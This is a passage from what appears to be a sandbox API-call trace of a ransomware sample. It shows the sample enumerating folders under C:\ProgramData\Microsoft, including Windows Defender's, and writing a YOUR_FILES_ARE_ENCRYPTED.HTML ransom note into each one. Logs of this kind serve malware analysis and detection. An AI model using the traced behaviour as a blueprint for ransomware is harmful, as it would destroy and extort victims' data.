lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0157.249] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0157.249] lstrcmpW (lpString1="guest.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.249] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0157.249] lstrlenW (lpString=".bmp") returned 4 [0157.249] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0157.249] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0157.249] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0157.249] lstrcmpW (lpString1="user.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.249] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0157.249] lstrlenW (lpString=".bmp") returned 4 [0157.249] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0157.249] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0157.249] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.250] wnsprintfW 
(in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0157.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.250] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.317] CloseHandle (hObject=0x598) returned 1 [0157.317] GetProcessHeap () returned 0x270000 [0157.318] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.318] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Vault", cAlternateFileName="")) returned 1 [0157.318] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned 34 [0157.318] GetProcessHeap () returned 0x270000 [0157.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.318] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" [0157.318] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*" [0157.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.319] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.319] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.319] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.319] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0157.319] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.320] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.322] CloseHandle (hObject=0x598) returned 1 [0157.323] GetProcessHeap () returned 0x270000 [0157.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.325] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1aaf0d60, ftLastAccessTime.dwHighDateTime=0x1d70563, ftLastWriteTime.dwLowDateTime=0x1aaf0d60, ftLastWriteTime.dwHighDateTime=0x1d70563, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0157.325] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0157.325] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned 45 [0157.325] GetProcessHeap () returned 0x270000 [0157.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.325] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" [0157.325] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*" [0157.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.328] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.328] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, 
ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0157.328] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned 64 [0157.328] GetProcessHeap () returned 0x270000 [0157.328] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.328] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" [0157.328] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*" [0157.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0157.329] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 71 [0157.329] GetProcessHeap () returned 0x270000 [0157.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.332] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0157.332] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0157.332] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.332] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.332] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.332] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.333] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0157.333] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition 
Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.333] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.336] CloseHandle (hObject=0x58c) returned 1 [0157.336] GetProcessHeap () returned 0x270000 [0157.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.338] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Updates", cAlternateFileName="")) returned 1 [0157.338] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 72 [0157.338] GetProcessHeap () returned 0x270000 [0157.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.338] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0157.338] lstrcatW (in: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0157.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.338] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.338] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.339] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) 
returned 1 [0157.339] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0157.339] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.339] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.342] CloseHandle (hObject=0x58c) returned 1 [0157.342] GetProcessHeap () returned 0x270000 [0157.344] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.344] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Updates", cAlternateFileName="")) returned 0 [0157.344] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.344] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0157.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.345] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.347] CloseHandle (hObject=0x5a0) returned 1 [0157.348] GetProcessHeap () returned 0x270000 [0157.349] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.349] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0157.349] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned 55 [0157.349] GetProcessHeap () returned 0x270000 [0157.349] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.349] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" [0157.350] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy", 
